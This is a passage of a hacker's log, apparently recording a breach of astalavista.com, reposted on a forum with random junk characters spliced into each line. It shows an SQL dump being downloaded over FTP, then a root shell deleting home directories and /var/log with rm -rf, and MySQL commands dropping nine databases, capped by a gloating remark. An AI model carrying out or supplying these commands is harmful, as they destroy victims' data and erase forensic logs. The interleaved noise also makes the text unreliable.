-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
6 X' O* @% K3 r! y% y5 n[snip]& F u; c" t8 R9 T5 i, [5 k V
226 Transfer complete.
7 _5 `* t5 c" {& L3 {1 nftp> mdelete *
# K/ q9 A' `/ Y' m7 xftp> ls -la' w7 M. j, X' v- [ p1 f# K5 B
227 Entering Passive Mode (212,254,194,163,2,193)
! d" u8 p' ]' G) X150 Opening BINARY mode data connection for ‘file list’.
8 B* G. a9 U5 ?2 q9 c( }4 h226 Transfer complete.1 z# i# H2 ^ L, v9 y2 ?
ftp>
[& l5 b" w G
* d5 s# O" ^2 {% _sh-3.2# cd /home
8 z8 Z4 V+ {% h' Ysh-3.2# ls -la
3 @3 E5 m$ U$ {0 D2 K$ wtotal 1204 S: S: F( Z+ `; q6 V: G" I
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
7 a' K; a: t- B% mdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..( M8 a) M9 {, [& B# f# e4 v
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin2 \+ C! p% m& n$ L N. a' O
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group( u- o* I2 t6 S7 V6 j. F
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user. T; g% H. r; h, @( n: s8 v
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
$ w, Y. `1 H1 s6 X# ]* r& p7 w( Zdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
7 n! S$ u' m% H6 e8 Jdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
. f, ]6 z5 B5 Gdrwx–x–x 10 com com 4096 Apr 28 12:40 com' U4 E# F5 j& f$ ]8 n' l
drwxr-xr-x 2 root root 4096 May 17 2007 ftp8 D* a) V% i1 G* `& e! v/ ?
drwx—— 3 jon jon 4096 Sep 21 2007 jon
/ I) V4 P" B6 \+ H# Sdrwx—— 2 root root 16384 Sep 11 2007 lost+found
; W. b1 l3 U1 m6 ]drwxr-xr-x 2 root root 4096 Sep 14 2007 my
: e2 X' U7 G& R1 K. v1 ndrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
W# p- E; Q. U% |( \8 Hdrwx—— 2 jon jon 4096 Sep 15 2007 test' `+ @- D$ o3 s9 x
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
$ H7 R7 l; x$ p$ N1 u
4 {7 p8 z o O# t4 q" h( F7 }) h0 rsh-3.2# rm -rf backup/
+ K* N0 J% \8 |# {# c2 u# K* A/ Xsh-3.2# rm -rf backup.14161/
2 j$ b" k' ?6 w/ y5 }sh-3.2# rm -rf ftp/
, b- d4 a4 H9 ^8 w; F( rsh-3.2# rm -rf jon/! W; Y! K, E6 f7 B' m" o( t( _- u
sh-3.2# rm -rf my/6 E- a6 g# V9 k+ p3 \- q) x% M
sh-3.2# rm -rf mysqldata/
7 f$ [& _# |! Qsh-3.2# rm -rf test/
l, L5 G- n: `" gsh-3.2# rm -rf tmp/
0 T4 L9 t6 c" p) dsh-3.2# cd ~7 ^) K+ a z/ |2 |
sh-3.2# rm -rf *
; \: Y& g0 ]% M1 {, ]5 m) ]sh-3.2# rm -rf /var/log/
3 I" U' v/ o4 c) brm: cannot remove directory `/var/log//proftpd’: Directory not empty" S5 B# A3 Y$ Z& M. D
sh-3.2# rm -rf /home/*. i' R; a0 J9 L' E- J* c- |# z
sh-3.2# mysql
5 w% a$ b9 m* p. ^Welcome to the MySQL monitor. Commands end with ; or \g.
& e1 f. Y4 K, ]1 I" T9 ~* p: MYour MySQL connection id is 407156
3 V9 g1 O' J* R% w2 ~/ UServer version: 5.0.45-community-log MySQL Community Edition (GPL)3 ]- V$ B/ Y& X }4 s
: c: W @) `1 I0 L- N. CType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.5 C7 V1 m) Z! _; F- \0 i( I
6 {1 K& e0 Z1 d8 U
mysql> show databases;
; ]3 `' T6 j+ ], k+———————–+
; \. Q f0 D1 d| Database |
3 j C) x2 Y# s) [9 q5 ]" Q+———————–+4 u1 H% L: `7 z! [ I
| information_schema |
" F- P0 v9 r: o, ?, n% \ j9 r4 X| astanet_ads |; F5 |1 p9 t% I0 f" p7 Z
| astanet_mailing_lists |- R/ T- |; a, X% U
| astanet_mediawiki |' Q: r7 P! u- w+ _7 k, p6 j
| astanet_membersystem |- L- u5 W8 M5 F+ k _
| com_contrexx |
8 a+ j& G6 {' K8 W| com_contrexx2 |
, H5 [( `& y/ I$ u) o% U. t8 G| com_contrexx2_live |+ K0 M; Y7 }# p
| da_roundcube |
5 h" }, M7 _, G! K0 B| dolphin |0 \( X* g6 b: t' A8 a
| ideapool |3 m9 z. N2 _8 G! M }! [& n! Z
| mysql |
+ p- C6 F/ t* n| test |
1 D& X9 L% g3 V5 ~| yourmaster |
, d. q7 T7 T+ Z0 M$ O/ b8 a# v1 v+———————–+
+ s& s6 \/ G5 V, S* B14 rows in set (0.03 sec)
! Y6 n% s* U$ f. a4 s* p" h- `5 T
6 k# Q+ x* `! D) Z5 F8 {mysql> drop database astanet_membersystem;
) G" i0 r/ \) X& U* S" Q2 o, HdroQuery OK, 46 rows affected (0.81 sec)4 v$ B# @! z; X) ~
3 j2 x# U+ d. k2 A9 m: Jmysql> drop database com_contrexx;
7 K: M* a a0 T& G- u5 ?& ^* c4 t" kQuery OK, 211 rows affected (2.72 sec)' K& ?& p o8 ]' w9 L+ t
, Q+ c0 O/ d- I+ o" j5 Lmysql> drop database com_contrexx2;
) a; r' j# Z5 P+ P4 n* L* X* E4 HQuery OK, 237 rows affected (2.23 sec)
" N9 _, p# X& q! T( _
: \. l0 j p' K3 \3 H6 Vmysql> drop database com_contrexx2_live;
. A; c8 a2 `; a: i5 h4 w5 ]) zQuery OK, 227 rows affected (7.63 sec)/ e# `' ~3 f# ?
# m# d/ x* H) J* R0 I. [2 [8 Cmysql> drop database ideapool;2 f1 i. _5 f6 g
Query OK, 69 rows affected (0.19 sec)$ v9 v% N, G! t! [9 G
, a' a$ ^0 |7 V3 T) a% Y3 ~mysql> drop database yourmaster;
z: g9 V5 k, y, jQuery OK, 158 rows affected (0.55 sec)
0 C, @2 c9 b& t- F/ F W5 @+ |6 r
^) b7 i& r4 D4 Cmysql> drop database astanet_ads;1 t x( O& g: E
Query OK, 9 rows affected (0.11 sec)# b" l% O3 H) M
5 b% f" \+ h5 g; lmysql> drop database astanet_mailing_lists;
4 ?1 x9 h3 x4 c: G+ O% S6 rQuery OK, 24 rows affected (1.47 sec)
1 l" u6 t Z8 W2 y& C q6 K
" H: Z8 ~% }3 @; k; L, Omysql> drop database astanet_mediawiki;
5 O7 Y0 O% n# d1 H& a t+ c7 B/ HQuery OK, 31 rows affected (0.51 sec)
$ }* F5 K$ L$ o0 d' T- p1 F3 f
# F# r( m) B7 rmysql> show databases;5 v8 v, m( L1 {( }0 l- O, [8 f
+——————–+6 K& k' B1 [9 D3 y
| Database |
' v _8 e: z2 G5 C+——————–+
& P- j8 g0 }4 l# f# N1 G2 y! \( H| information_schema |9 i% c' ~, }' @0 W7 d% v# O
| da_roundcube | Z% ]2 \9 h" W6 W8 B; ^
| dolphin |
$ b/ C3 W' ?- M/ ^ Z| mysql |
3 v1 x& R- l+ s) w5 l| test |5 g5 ?4 F. r P( f* e1 u) J0 }& {; Z
+——————–+6 P" {; n& q+ L. O* M/ z+ ~
5 rows in set (0.00 sec)2 R. y8 V7 a8 _9 w/ f
) R) `# ?8 h4 W+ g* dWhat a journey! We’re not sure exactly why the “Terminator” had any influence on5 P9 l! v+ j1 m5 i* ^/ E; v
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
5 v/ }0 x+ b& n$ b& @( m" Dwrong to say this pack of morons *wont be back*.
& E4 V5 _8 j" @* Z& d- T |
发表于 2012-11-6 21:07:34
收藏
支持
反对